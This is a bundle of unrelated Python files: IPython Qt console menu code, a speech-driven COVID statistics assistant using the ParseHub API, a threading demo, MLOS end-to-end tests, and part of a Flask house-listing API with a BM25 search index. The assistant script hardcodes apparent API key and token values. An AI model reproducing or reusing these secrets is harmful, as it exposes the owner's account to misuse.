triggered=self.paste_active_frontend
)
self.add_menu_action(self.edit_menu, self.paste_action, True)
self.edit_menu.addSeparator()
selectall = QtGui.QKeySequence(QtGui.QKeySequence.SelectAll)
if selectall.matches("Ctrl+A") and sys.platform != 'darwin':
# Only override the default if there is a collision.
# Qt ctrl = cmd on OSX, so the match gets a false positive on OSX.
selectall = "Ctrl+Shift+A"
self.select_all_action = QtGui.QAction("Select &All",
self,
shortcut=selectall,
triggered=self.select_all_active_frontend
)
self.add_menu_action(self.edit_menu, self.select_all_action, True)
def init_view_menu(self):
self.view_menu = self.menuBar().addMenu("&View")
if sys.platform != 'darwin':
# disable on OSX, where there is always a menu bar
self.toggle_menu_bar_act = QtGui.QAction("Toggle &Menu Bar",
self,
shortcut="Ctrl+Shift+M",
statusTip="Toggle visibility of menubar",
triggered=self.toggle_menu_bar)
self.add_menu_action(self.view_menu, self.toggle_menu_bar_act)
fs_key = "Ctrl+Meta+F" if sys.platform == 'darwin' else "F11"
self.full_screen_act = QtGui.QAction("&Full Screen",
self,
shortcut=fs_key,
statusTip="Toggle between Fullscreen and Normal Size",
triggered=self.toggleFullScreen)
self.add_menu_action(self.view_menu, self.full_screen_act)
self.view_menu.addSeparator()
self.increase_font_size = QtGui.QAction("Zoom &In",
self,
shortcut=QtGui.QKeySequence.ZoomIn,
triggered=self.increase_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.increase_font_size, True)
self.decrease_font_size = QtGui.QAction("Zoom &Out",
self,
shortcut=QtGui.QKeySequence.ZoomOut,
triggered=self.decrease_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.decrease_font_size, True)
self.reset_font_size = QtGui.QAction("Zoom &Reset",
self,
shortcut="Ctrl+0",
triggered=self.reset_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.reset_font_size, True)
self.view_menu.addSeparator()
self.clear_action = QtGui.QAction("&Clear Screen",
self,
shortcut='Ctrl+L',
statusTip="Clear the console",
triggered=self.clear_magic_active_frontend)
self.add_menu_action(self.view_menu, self.clear_action)
def init_kernel_menu(self):
self.kernel_menu = self.menuBar().addMenu("&Kernel")
# Qt on OSX maps Ctrl to Cmd, and Meta to Ctrl
# keep the signal shortcuts to ctrl, rather than
# platform-default like we do elsewhere.
ctrl = "Meta" if sys.platform == 'darwin' else "Ctrl"
self.interrupt_kernel_action = QtGui.QAction("&Interrupt current Kernel",
self,
triggered=self.interrupt_kernel_active_frontend,
shortcut=ctrl+"+C",
)
self.add_menu_action(self.kernel_menu, self.interrupt_kernel_action)
self.restart_kernel_action = QtGui.QAction("&Restart current Kernel",
self,
triggered=self.restart_kernel_active_frontend,
shortcut=ctrl+"+.",
)
self.add_menu_action(self.kernel_menu, self.restart_kernel_action)
self.kernel_menu.addSeparator()
self.confirm_restart_kernel_action = QtGui.QAction("&Confirm kernel restart",
self,
checkable=True,
checked=self.active_frontend.confirm_restart,
triggered=self.toggle_confirm_restart_active_frontend
)
self.add_menu_action(self.kernel_menu, self.confirm_restart_kernel_action)
self.tab_widget.currentChanged.connect(self.update_restart_checkbox)
def _make_dynamic_magic(self,magic):
"""Return a function `fun` that will execute `magic` on active frontend.
Parameters
----------
magic : string
string that will be executed as is when the returned function is called
Returns
-------
fun : function
function with no parameters, when called will execute `magic` on the
current active frontend at call time
See Also
--------
populate_all_magic_menu : generate the "All Magics..." menu
Notes
-----
`fun` executes `magic` in the frontend that is active at the moment it is triggered,
not in the frontend that was active when `fun` was created.
This function is mostly used to create the "All Magics..." Menu at run time.
"""
# need two level nested function to be sure to pass magic
# to active frontend **at run time**.
def inner_dynamic_magic():
self.active_frontend.execute(magic)
inner_dynamic_magic.__name__ = "dynamics_magic_s"
return inner_dynamic_magic
def populate_all_magic_menu(self, listofmagic=None):
"""Clean "All Magics..." menu and repopulate it with `listofmagic`
Parameters
----------
listofmagic : string
repr() of a list of strings, sent back by the kernel
Notes
-----
`listofmagic` is a repr() of a list because it is fed with the result of
a 'user_expression'.
"""
for k,v in self._magic_menu_dict.items():
v.clear()
self.all_magic_menu.clear()
protected_magic = set(["more","less","load_ext","pycat","loadpy","load","save","psource"])
mlist=ast.literal_eval(listofmagic)
for magic in mlist:
cell = (magic['type'] == 'cell')
name = magic['name']
mclass = magic['class']
if cell :
prefix='%%'
else :
prefix='%'
magic_menu = self._get_magic_menu(mclass)
if name in protected_magic:
suffix = '?'
else :
suffix = ''
pmagic = '%s%s%s'%(prefix,name,suffix)
xaction = QtGui.QAction(pmagic,
self,
triggered=self._make_dynamic_magic(pmagic)
)
magic_menu.addAction(xaction)
self.all_magic_menu.addAction(xaction)
def update_all_magic_menu(self):
""" Update the list of magics in the "All Magics..." Menu
Request the list of available magics from the kernel and populate the
menu with the list received back.
"""
self.active_frontend._silent_exec_callback('get_ipython().magics_manager.lsmagic_info()',
self.populate_all_magic_menu)
def _get_magic_menu(self,menuidentifier, menulabel=None):
"""return a submagic menu by name, and create it if needed
parameters:
-----------
menulabel : str
Label for the menu
Will infere the menu name from the identifier at creation if menulabel not given.
To do so you have too give menuidentifier as a CamelCassedString
"""
menu = self._magic_menu_dict.get(menuidentifier,None)
if not menu :
if not menulabel:
menulabel = re.sub(r"([a-zA-Z]+)([A-Z][a-z])", r"\g<1> \g<2>", menuidentifier)
menu = QtGui.QMenu(menulabel,self.magic_menu)
self._magic_menu_dict[menuidentifier]=menu
self.magic_menu.insertMenu(self.magic_menu_separator,menu)
return menu
def init_magic_menu(self):
self.magic_menu = self.menuBar().addMenu("&Magic")
self.magic_menu_separator = self.magic_menu.addSeparator()
self.all_magic_menu = self._get_magic_menu("AllMagics", menulabel="&All Magics...")
# This action should usually not appear as it will be cleared when menu
# is updated at first kernel response. Though, it is necessary when
# connecting through X-forwarding, as in this case, the menu is not
# auto updated, SO DO NOT DELETE.
self.pop = QtGui.QAction("&Update All Magic Menu ",
self, triggered=self.update_all_magic_menu)
self.add_menu_action(self.all_magic_menu, self.pop)
# We need to populate the 'Magic Menu' once the kernel has answered at least once;
# trigger it immediately here, even though it is not guaranteed to succeed before the kernel responds.
self.pop.trigger()
self.reset_action = QtGui.QAction("&Reset",
self,
statusTip="Clear all variables from workspace",
triggered=self.reset_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.reset_action)
self.history_action = QtGui.QAction("&History",
self,
statusTip="show command history",
triggered=self.history_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.history_action)
self.save_action = QtGui.QAction("E&xport History ",
self,
statusTip="Export History as Python File",
triggered=self.save_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.save_action)
self.who_action = QtGui.QAction("&Who",
self,
statusTip="List interactive variables",
triggered=self.who_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.who_action)
self.who_ls_action = QtGui.QAction("Wh&o ls",
self,
statusTip="Return a list of interactive variables",
triggered=self.who_ls_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.who_ls_action)
self.whos_action = QtGui.QAction("Who&s",
self,
statusTip="List interactive variables with details",
triggered=self.whos_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.whos_action)
def init_window_menu(self):
self.window_menu = self.menuBar().addMenu("&Window")
if sys.platform == 'darwin':
# add min/maximize actions to OSX, which lacks default bindings.
self.minimizeAct = QtGui.QAction("Mini&mize",
self,
shortcut="Ctrl+m",
statusTip="Minimize the window/Restore Normal Size",
triggered=self.toggleMinimized)
# maximize is called 'Zoom' on OSX for some reason
self.maximizeAct = QtGui.QAction("&Zoom",
self,
shortcut="Ctrl+Shift+M",
statusTip="Maximize the window/Restore Normal Size",
triggered=self.toggleMaximized)
self.add_menu_action(self.window_menu, self.minimizeAct)
self.add_menu_action(self.window_menu, self.maximizeAct)
self.window_menu.addSeparator()
prev_key = "Ctrl+Shift+Left" if sys.platform == 'darwin' else "Ctrl+PgUp"
self.prev_tab_act = QtGui.QAction("Pre&vious Tab",
self,
shortcut=prev_key,
statusTip="Select previous tab",
triggered=self.prev_tab)
self.add_menu_action(self.window_menu, self.prev_tab_act)
next_key = "Ctrl+Shift+Right" if sys.platform == 'darwin' else "Ctrl+PgDown"
self.next_tab_act = QtGui.QAction("Ne&xt Tab",
self,
shortcut=next_key,
statusTip="Select next tab",
triggered=self.next_tab)
self.add_menu_action(self.window_menu, self.next_tab_act)
def init_help_menu(self):
# Please keep the Help menu on Mac OS even if it is empty: it will automatically
# contain a search field for searching inside menus. Also keep it spelled in
# English; as long as Qt doesn't support a QAction.MenuRole like HelpMenuRole,
# renaming it would lose this search-field functionality.
self.help_menu = self.menuBar().addMenu("&Help")
# Help Menu
self.intro_active_frontend_action = QtGui.QAction("&Intro to IPython",
self,
triggered=self.intro_active_frontend
)
self.add_menu_action(self.help_menu, self.intro_active_frontend_action)
self.quickref_active_frontend_action = QtGui.QAction("IPython &Cheat Sheet",
self,
triggered=self.quickref_active_frontend
)
self.add_menu_action(self.help_menu, self.quickref_active_frontend_action)
self.guiref_active_frontend_action = QtGui.QAction("&Qt Console",
self,
triggered=self.guiref_active_frontend
)
self.add_menu_action(self.help_menu, self.guiref_active_frontend_action)
self.onlineHelpAct = QtGui.QAction("Open Online &Help",
self,
triggered=self._open_online_help)
self.add_menu_action(self.help_menu, self.onlineHelpAct)
# minimize/maximize/fullscreen actions:
def toggle_menu_bar(self):
menu_bar = self.menuBar()
if menu_bar.isVisible():
menu_bar.setVisible(False)
else:
menu_bar.setVisible(True)
def toggleMinimized(self):
if not self.isMinimized():
self.showMinimized()
else:
self.showNormal()
def _open_online_help(self):
filename="http://ipython.org/ipython-doc/stable/index.html"
webbrowser.open(filename, new=1, autoraise=True)
def toggleMaximized(self):
if not self.isMaximized():
self.showMaximized()
else:
self.showNormal()
# Minimizing/maximizing while in full screen causes a bug when leaving
# full screen, at least on OSX.
def toggleFullScreen(self):
if not self.isFullScreen():
self.showFullScreen()
if sys.platform == 'darwin':
self.maximizeAct.setEnabled(False)
self.minimizeAct.setEnabled(False)
else:
self.showNormal()
if sys.platform == 'darwin':
self.maximizeAct.setEnabled(True)
self.minimizeAct.setEnabled(True)
def close_active_frontend(self):
self.close_tab(self.active_frontend)
def restart_kernel_active_frontend(self):
self.active_frontend.request_restart_kernel()
def interrupt_kernel_active_frontend(self):
self.active_frontend.request_interrupt_kernel()
def toggle_confirm_restart_active_frontend(self):
widget = self.active_frontend
widget.confirm_restart = not widget.confirm_restart
self.confirm_restart_kernel_action.setChecked(widget.confirm_restart)
def update_restart_checkbox(self):
if self.active_frontend is None:
return
widget = self.active_frontend
self.confirm_restart_kernel_action.setChecked(widget.confirm_restart)
def cut_active_frontend(self):
widget = self.active_frontend
if widget.can_cut():
widget.cut()
def copy_active_frontend(self):
widget = self.active_frontend
widget.copy()
def copy_raw_active_frontend(self):
self.active_frontend._copy_raw_action.trigger()
def paste_active_frontend(self):
widget = self.active_frontend
if widget.can_paste():
widget.paste()
def undo_active_frontend(self):
self.active_frontend.undo()
def redo_active_frontend(self):
self.active_frontend.redo()
def reset_magic_active_frontend(self):
self.active_frontend.execute("%reset")
def history_magic_active_frontend(self):
self.active_frontend.execute("%history")
def save_magic_active_frontend(self):
self.active_frontend.save_magic()
def clear_magic_active_frontend(self):
self.active_frontend.execute("%clear")
def who_magic_active_frontend(self):
self.active_frontend.execute("%who")
def who_ls_magic_active_frontend(self):
self.active_frontend.execute("%who_ls")
def whos_magic_active_frontend(self):
self.active_frontend.execute("%whos")
def print_action_active_frontend(self):
self.active_frontend.print_action.trigger()
def export_action_active_frontend(self):
self.active_frontend.export_action.trigger()
def select_all_active_frontend(self):
self.active_frontend.select_all_action.trigger()
def increase_font_size_active_frontend(self):
self.active_frontend.increase_font_size.trigger()
def decrease_font_size_active_frontend(self):
self.active_frontend.decrease_font_size.trigger()
def reset_font_size_active_frontend(self):
self.active_frontend.reset_font_size.trigger()
def guiref_active_frontend(self):
self.active_frontend.execute("%guiref")
def intro_active_frontend(self):
self.active_frontend.execute("?")
def quickref_active_frontend(self):
self.active_frontend.execute("%quickref")
#---------------------------------------------------------------------------
# QWidget interface
#---------------------------------------------------------------------------
def closeEvent(self, event):
""" Forward the close event to every tabs contained by the windows
"""
if self.tab_widget.count() == 0:
# no tabs, just close
event.accept()
return
# Do not loop on the widget count, as it changes while closing.
title = self.window().windowTitle()
cancel = QtGui.QMessageBox.Cancel
okay = QtGui.QMessageBox.Ok
if self.confirm_exit:
if self.tab_widget.count() > 1:
msg = "Close all tabs, stop all kernels, and Quit?"
else:
msg = "Close console, stop kernel, and Quit?"
info = "Kernels not started here (e.g. notebooks) will be left alone."
closeall = QtGui.QPushButton("&Quit", self)
closeall.setShortcut('Q')
box = QtGui.QMessageBox(QtGui.QMessageBox.Question,
title, msg)
box.setInformativeText(info)
box.addButton(cancel)
box.addButton(closeall, QtGui.QMessageBox.YesRole)
box.setDefaultButton(closeall)
box.setEscapeButton(cancel)
pixmap = QtGui.QPixmap(self._app.icon.pixmap(QtCore.QSize(64,64)))
box.setIconPixmap(pixmap)
reply = box.exec_()
else:
reply = okay
if reply == cancel:
event.ignore()
return
if reply == okay:
while self.tab_widget.count() >= 1:
# prevent further confirmations:
widget = self.active_frontend
widget._confirm_exit = False
self.close_tab(widget)
event.accept()
|
main.py
|
import requests
import json
import pyttsx3
import speech_recognition as sr
import re
import threading
import time
API_KEY= "t1zcRzKZR3q3"
PROJECT_TOKEN= "t1Oa2KH2oM0N"
RUN_TOKEN="txCLmJmi8FwO"
class Data:
def __init__(self, api_key, project_token):
self.api_key = api_key
self.project_token = project_token
self.params = {
"api_key": self.api_key
}
self.data = self.get_data()
def get_data(self):
response = requests.get(f'https://www.parsehub.com/api/v2/projects/{self.project_token}/last_ready_run/data', params=self.params)
data = json.loads(response.text)
return data #to avoid overwriting of data
def get_total_cases(self):
data = self.data['total']
for content in data:
if content['name'] == "Coronavirus Cases:":
return content['value']
def get_total_deaths(self):
data = self.data['total']
for content in data:
if content['name'] == "Deaths:":
return content['value']
return "0"
def get_country_data(self, country):
data = self.data["country"]
for content in data:
if content['name'].lower() == country.lower():
return content
return "0"
def get_list_of_countries(self):
countries = []
for country in self.data['country']:
countries.append(country['name'].lower())
return countries
def update_data(self) :
response = requests.post(f'https://www.parsehub.com/api/v2/projects/{self.project_token}/run', params=self.params)
def poll():
time.sleep(0.1)
old_data = self.data
while True:
new_data = self.get_data()
if new_data != old_data:
self.data = new_data
print("Data updated")
break
time.sleep(5)
t = threading.Thread(target=poll)
t.start()
# Inside the thread we repeatedly poll the server for new data. The request/response
# cycle takes time, so polling in a background thread lets the user keep interacting
# with the voice assistant while the server is still preparing the updated data, and
# it does not interfere with main(). Starting the thread itself only takes a few
# microseconds, so the main loop is not blocked while the full data set is fetched.
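# Hedged usage sketch (added for illustration, never called): how the Data class
# above is meant to be queried. "india" is just an assumed country name; the real
# output depends on whatever the last ParseHub run scraped.
def example_data_usage():
    data = Data(API_KEY, PROJECT_TOKEN)            # fetch the last ready run once
    print("Total cases:", data.get_total_cases())
    print("Total deaths:", data.get_total_deaths())
    if "india" in data.get_list_of_countries():    # guard against a missing country
        print("India:", data.get_country_data("india"))
    data.update_data()                             # trigger a new run; polled in a background thread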
def speak(text):
engine =pyttsx3.init()
engine.say(text)
engine.runAndWait()
def get_audio():
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.listen(source)
said = ""
try:
said = r.recognize_google(audio)
except Exception as e:
print("Exception:", str(e))
return said.lower()
def main():
print("Started Program")
data = Data(API_KEY, PROJECT_TOKEN)
END_PHRASE = "stop"
country_list = data.get_list_of_countries()
# regex patterns for recognizing the spoken query
TOTAL_PATTERNS = {
re.compile("[\w\s]+ total [\w\s]+ cases"):data.get_total_cases,
re.compile("[\w\s]+ total cases"): data.get_total_cases,
re.compile("[\w\s]+ total [\w\s]+ deaths"): data.get_total_deaths,
re.compile("[\w\s]+ total deaths"): data.get_total_deaths
}
COUNTRY_PATTERNS = {
re.compile("[\w\s]+ cases [\w\s]+"): lambda country: data.get_country_data(country)['total_cases'],
re.compile("[\w\s]+ deaths [\w\s]+"): lambda country: data.get_country_data(country)['total_deaths'],
}
UPDATE_COMMAND = "update"
while True:
print("Listening...")
text = get_audio()
print(text)
result = None
for pattern, func in COUNTRY_PATTERNS.items():
if pattern.match(text):
words = set(text.split(" "))
for country in country_list:
if country in words:
result = func(country)
break
for pattern, func in TOTAL_PATTERNS.items():
if pattern.match(text):
result = func()
break
if text == UPDATE_COMMAND:
result = "Data is being updated. This may take a moment!"
data.update_data()
if result:
speak(result)
if text.find(END_PHRASE) != -1: # stop loop
print("Exit")
break
main()
|
threading_join.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:Lyon
# import threading
# import time
# class MyThread(threading.Thread):
# def __init__(self,name):
# threading.Thread.__init__(self)
# self.name = name
#
# def run(self):
# print("I am %s" % self.name)
# time.sleep(2)
#
# if __name__ == '__main__':
# t1 = MyThread('Lyon')
# t2 = MyThread('Kenneth')
# t1.start()
# t1.join()
# t2.start()
# t2.join()
# print("主线程")
import threading
import time
def run(name):
print("I am %s" % name)
time.sleep(2)
print("When I'm done, I'm going to keep talking...")
if __name__ == '__main__':
lyon = threading.Thread(target=run, args=('Lyon',))
kenneth = threading.Thread(target=run, args=('Kenneth',))
lyon.start()
lyon.join()
kenneth.start()
kenneth.join()
print("I was the main thread, and I ended up executing")
|
TestE2EScenarios.py
|
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
#
import logging
from threading import Thread
import time
import unittest
from mlos.Logger import create_logger
from mlos.Examples.SmartCache import SmartCacheWorkloadGenerator, SmartCache
from mlos.Examples.SmartCache.TelemetryAggregators.WorkingSetSizeEstimator import WorkingSetSizeEstimator
from mlos.Mlos.Infrastructure import CommunicationChannel, SharedConfig
from mlos.Mlos.SDK import mlos_globals, MlosGlobalContext, MlosExperiment, MlosAgent
from mlos.Mlos.SDK.CommonAggregators.Timer import Timer
class TestE2EScenarios(unittest.TestCase):
""" Tests aggregators based on the timer.
"""
@classmethod
def setUpClass(cls) -> None:
mlos_globals.init_mlos_global_context()
cls.logger = create_logger('TestE2EScenarios')
cls.logger.level = logging.INFO
cls.mlos_agent = MlosAgent(
logger=cls.logger,
communication_channel=mlos_globals.mlos_global_context.communication_channel,
shared_config=mlos_globals.mlos_global_context.shared_config
)
cls.mlos_agent_thread = Thread(target=cls.mlos_agent.run)
cls.mlos_agent_thread.start()
mlos_globals.mlos_global_context.start_clock()
cls.mlos_agent.add_allowed_component_type(SmartCache)
cls.mlos_agent.add_allowed_component_type(SmartCacheWorkloadGenerator)
@classmethod
def tearDownClass(cls) -> None:
cls.mlos_agent.stop_all()
mlos_globals.mlos_global_context.stop_clock()
def test_timer(self):
""" Tests if the timer works with required precision.
:return:
"""
timeout_ms = 100
epsilon_ms = 10
def _process_clock_event(elapsed_time_ms):
self.assertTrue(elapsed_time_ms + epsilon_ms > timeout_ms)
self.logger.debug(f"Processed clock event. Elapsed time: {elapsed_time_ms}")
timer = Timer(
timeout_ms=timeout_ms,
observer_callback=_process_clock_event,
epsilon_ms=epsilon_ms
)
timer_experiment = MlosExperiment(
smart_component_types=[],
telemetry_aggregators=[timer]
)
self.mlos_agent.start_experiment(timer_experiment)
time.sleep(1)
self.mlos_agent.stop_experiment(timer_experiment)
def test_setting_random_configs_for_smart_cache_workload(self):
workload_duration_s = 1
# Let's launch the smart_cache_workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
self.current_workload_config_values = smart_cache_workload.current_config.values
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
def _set_random_workload_configuration(elapsed_time_ms):
new_config_values = SmartCacheWorkloadGenerator.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCacheWorkloadGenerator,
new_config_values=new_config_values
)
self.current_workload_config_values = new_config_values
timer = Timer(
timeout_ms=100,
observer_callback=_set_random_workload_configuration
)
random_workload_config_experiment = MlosExperiment(
smart_component_types=[SmartCacheWorkloadGenerator],
telemetry_aggregators=[timer]
)
self.mlos_agent.start_experiment(random_workload_config_experiment)
time.sleep(workload_duration_s)
self.mlos_agent.stop_experiment(random_workload_config_experiment)
def test_setting_random_configs_for_smart_cache(self):
workload_duration_s = 5
# Let's create the workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
def _set_random_cache_configuration(elapsed_time_ms):
""" This is where we would potentially query the optimizer.
:param elapsed_time_ms:
:return:
"""
new_config_values = SmartCache.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCache,
new_config_values=new_config_values
)
current_estimate = working_set_size_estimator.estimate_working_set_size()
self.logger.info(f"Estimated working set size: {current_estimate.chapman_estimator}")
cache_config_timer = Timer(
timeout_ms=200,
observer_callback=_set_random_cache_configuration
)
working_set_size_estimator = WorkingSetSizeEstimator()
smart_cache_experiment = MlosExperiment(
smart_component_types=[SmartCache],
telemetry_aggregators=[cache_config_timer, working_set_size_estimator]
)
self.mlos_agent.start_experiment(smart_cache_experiment)
##################################################################################
# Let's launch the smart_cache_workload
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
smart_cache_workload_thread.join()
self.mlos_agent.stop_experiment(smart_cache_experiment)
def test_setting_random_configs_for_smart_cache_and_for_smart_cache_workload(self):
""" Enables two experiments at once: one to set the cache parameters, the other to set the workload parameters.
:return:
"""
workload_duration_s = 2
# Let's create the workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
self.current_workload_config_values = smart_cache_workload.current_config.values
##################################################################################
# Let's configure the experiment changing the workload configuration
def _set_random_workload_configuration(elapsed_time_ms):
# First check that the config has been consumed
#if smart_cache_workload.current_config.values != self.current_workload_config_values:
# print("Put breakpoint here.")
#self.assertTrue(smart_cache_workload.current_config.values == self.current_workload_config_values)
new_config_values = SmartCacheWorkloadGenerator.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCacheWorkloadGenerator,
new_config_values=new_config_values
)
self.current_workload_config_values = new_config_values
workload_timer = Timer(
timeout_ms=100,
observer_callback=_set_random_workload_configuration
)
random_workload_config_experiment = MlosExperiment(
smart_component_types=[SmartCacheWorkloadGenerator],
telemetry_aggregators=[workload_timer]
)
self.mlos_agent.start_experiment(random_workload_config_experiment)
##################################################################################
# Now let's configure the smart cache tuning experiment
def _set_random_cache_configuration(elapsed_time_ms):
""" This is where we would potentially query the optimizer.
:param elapsed_time_ms:
:return:
"""
new_config_values = SmartCache.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCache,
new_config_values=new_config_values
)
current_estimate = working_set_size_estimator.estimate_working_set_size()
self.logger.info(f"Estimated working set size: {current_estimate.chapman_estimator}")
cache_config_timer = Timer(
timeout_ms=200,
observer_callback=_set_random_cache_configuration
)
working_set_size_estimator = WorkingSetSizeEstimator()
smart_cache_experiment = MlosExperiment(
smart_component_types=[SmartCache],
telemetry_aggregators=[cache_config_timer, working_set_size_estimator]
)
self.mlos_agent.start_experiment(smart_cache_experiment)
##################################################################################
# Let's launch the smart_cache_workload
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
time.sleep(workload_duration_s)
self.mlos_agent.stop_experiment(smart_cache_experiment)
self.mlos_agent.stop_experiment(random_workload_config_experiment)
smart_cache_workload_thread.join()
all_registered_mlos_objects = set((component_type, runtime_attributes) for component_type ,runtime_attributes in self.mlos_agent.enumerate_active_smart_components())
self.assertTrue(
(smart_cache_workload.mlos_object.owning_component_type, smart_cache_workload.mlos_object.owning_component_runtime_attributes)
in all_registered_mlos_objects
)
del smart_cache_workload
self.mlos_agent.stop_all()
all_registered_mlos_objects = set(mlos_object for mlos_object in self.mlos_agent.enumerate_active_smart_components())
if len(all_registered_mlos_objects) != 0:
print("Put breakpoint here")
self.assertTrue(len(all_registered_mlos_objects) == 0)
|
houseList.py
|
import random
import threading
import joblib
from flask import Blueprint, render_template, session, flash, redirect, request, url_for
from src.extension import db
from src.Models.Houses import House
from src.Models.Targets import Targets
from src.Models.Users import User
from src.Utility import enumMachine
import math
import re
# from time import time
import time
import os
import json
from src.blueprints.search_community import searchCommunity
from src.blueprints.search_community import data
houseList = Blueprint('HouseList', __name__)
###################################################
# 3. Listing APIs
############################################
@houseList.route("/test", methods=['GET', 'POST'])
def test():
return "0"  # Flask views must return a str/dict/Response, not a bare int
def preProcessing(document):
print("This is the first time to run. The program needs document processing. Please wait a moment")
N = 0 # Calculate the number of documents in the collection
avg_doclen = 0 # The average length of a document in the collection, will be used later
comp = re.compile('[^a-z^0-9^ ]') # A compiler to remove the punctuation
Ni = {} # Number of documents contains term i, key is the term, value is Ni
Fij = {} # Frequency of term i in document j, key is the document number, value is a dict
k = 1 # k for BM25
b = 0.75 # b for BM25
# t1 = time()
for docs in document.values():
temp_l = []
for v in docs.values():
if get_keys(docs, v)[0] != 'collected' and get_keys(docs, v)[0] != 'imgUrl' and get_keys(docs, v)[
0] != 'houseId':
temp_l.append(str(v))
N += 1
line = ' '.join(temp_l)
# line = comp.sub(' ', line.lower())
line = line.lower()
line = line.replace("-", ",")
line = line.replace("_", ",")
line = line.replace(" ", ",")
line = line.replace("|", ",")
line_split = line.split(",")
print(line_split)
newDict = {} # Store the frequency of terms in this document, key is the term, value is the frequency
for elements in line_split:
avg_doclen += 1 # Calculate the number of terms in the document collection
if elements in newDict: # Calculate the frequency of this term in this document
newDict[elements] += 1
else:
newDict[elements] = 1
for terms in newDict: # Calculate the number of documents contains this term
if terms not in Ni:
Ni[terms] = 1
else:
Ni[terms] += 1
Fij[get_keys(document, docs)[0]] = newDict
# t2 = time()
for terms in Ni.keys():
Ni[terms] = math.log2(
(N - Ni[terms] + 0.5) / (Ni[terms] + 0.5)) # Calculate the value for future calculations
avg_doclen = avg_doclen / N # Calculate the average doc length
index = {} # Store the BM25 value of every term in every document, key is the document name, value is the BM25_dict
for keys in Fij.keys():
BM25_dict = {} # Store the BM25 value of each term, key is the term, value is BM25 value
lenDj = calculateLength(Fij[keys])
for elements in Fij[keys].keys():
BM25 = (((Fij[keys])[elements] * (1 + k)) / (
(Fij[keys])[elements] + k * ((1 - b) + (b * lenDj) / avg_doclen))) * Ni[elements]
BM25_dict[elements] = BM25
index[keys] = BM25_dict
js = json.dumps(index) # use json to store the dict in the txt file
with open("home_search.txt", "w") as f:
f.write(js)
# t3 = time()
print("Document processing completed")
def calculateLength(dict): # calculate the length of a document
length = 0
for values in dict.values():
length += values
return length
def get_keys(d, value):
return [k for k, v in d.items() if v == value]
####################################
# 3.1. Get house list API: ###
####################################
# Input:  timeRange       Array   publication-time range; calendar-date strings: "yyyy-mm-dd"
#         priceRange      Array   price range; string-formatted prices: "1000000"
#         otherFeatures   Object  wrapper for the other filter features; fields are parsed
#                                 according to the dictionary in the static config file
#         pageNum         String  current page number (for pagination)
#         pageSize        String  items per page (for pagination)
#         searchString    String  search string for the BM25 search
# Output: "success": 1,
#         "data": {
#             "total": ""        // total number of results, for pagination   ***** new *****
#             "houseList": [     // list of house records; length matches pageSize
#                 {
#                     "imgUrl": "",       // URL of the house image
#                     "title": "",        // house title
#                     "describe": "",     // house description
#                     "position": "",     // house address (region + district, joined by the backend)
#                     "coordinate": [],   // longitude/latitude of the house (for map display)
#                     "houseId": "",      // house id
#                     "totalPrice": "",   // total price                      ***** new *****
#                     "unitPrice": "",    // unit price                       ***** new *****
#                     "collected": true   // whether this user has favourited it ***** new *****
#                 },
#             ]
#         },
#
# Variable notes: argdict is the parameter dictionary built from the request
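# Illustrative request body for /getHouseList, matching the fields read in getHouse()
# below. Every value is an assumption made up for documentation: ranges of [0, 0] mean
# "no filter" and empty lists mean "all enum values", as handled by the view.
EXAMPLE_GET_HOUSE_LIST_PAYLOAD = {
    "userId": 1,
    "timeRange": [0, 0],
    "totalPriceRange": ["0", "0"],
    "unitPriceRange": ["0", "0"],
    "area": ["0", "0"],
    "district": [],
    "houseStructure": [],
    "direction": [],
    "decoration": [],
    "heating": [],
    "elevator": [],
    "pageNum": "1",
    "pageSize": "10",
    "searchString": "two bedrooms south"
}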
@houseList.route("/getHouseList", methods=['GET', 'POST'])
def getHouse():
global argdict # get the parameter from the front
if request.method == 'POST':
timeRange = None
totalPriceRange = None
unitPriceRange = None
area = None
district = None
houseStructrue = None
decoration = None
direction = None
heating = None
elevator = None
pageNum = None
pageSize = None
searchString = None
userId = request.json.get('userId')
timeRange = request.json.get('timeRange')
if timeRange == [0, 0]:
timeRange = [0, 9999990]
totalPriceRange = request.json.get('totalPriceRange')
totalPriceRange = [int(x) for x in totalPriceRange]
if totalPriceRange == [0, 0]:
totalPriceRange = [0, 999999999]
totalPriceRange[0] = int(totalPriceRange[0] / 10000)
totalPriceRange[1] = int(totalPriceRange[1] / 10000)
unitPriceRange = request.json.get('unitPriceRange')
unitPriceRange = [int(x) for x in unitPriceRange]
if unitPriceRange == [0, 0]:
unitPriceRange = [0, 99999999]
area = request.json.get('area')
print(area)
area = [int(x) for x in area]
if area == [0, 0]:
area = [0, 99999999]
districtEnum = request.json.get('district')
if districtEnum == []:
districtEnum = enumMachine.District.values
district = []
for item in districtEnum:
district.append(enumMachine.District.enum2field(item))
houseStructrueEnum = request.json.get('houseStructure')
if houseStructrueEnum == []:
houseStructrueEnum = enumMachine.House_structrue.values
print(houseStructrueEnum)
houseStructrue = []
for item in houseStructrueEnum:
houseStructrue.append(enumMachine.House_structrue.enum2field(item))
direction_listEnum = request.json.get('direction')
if direction_listEnum == []:
direction_listEnum = enumMachine.Direction.values
direction_list = []
for item in direction_listEnum:
direction_list.append(enumMachine.Direction.enum2field(item))
decorationEnum = request.json.get('decoration')
if decorationEnum == []:
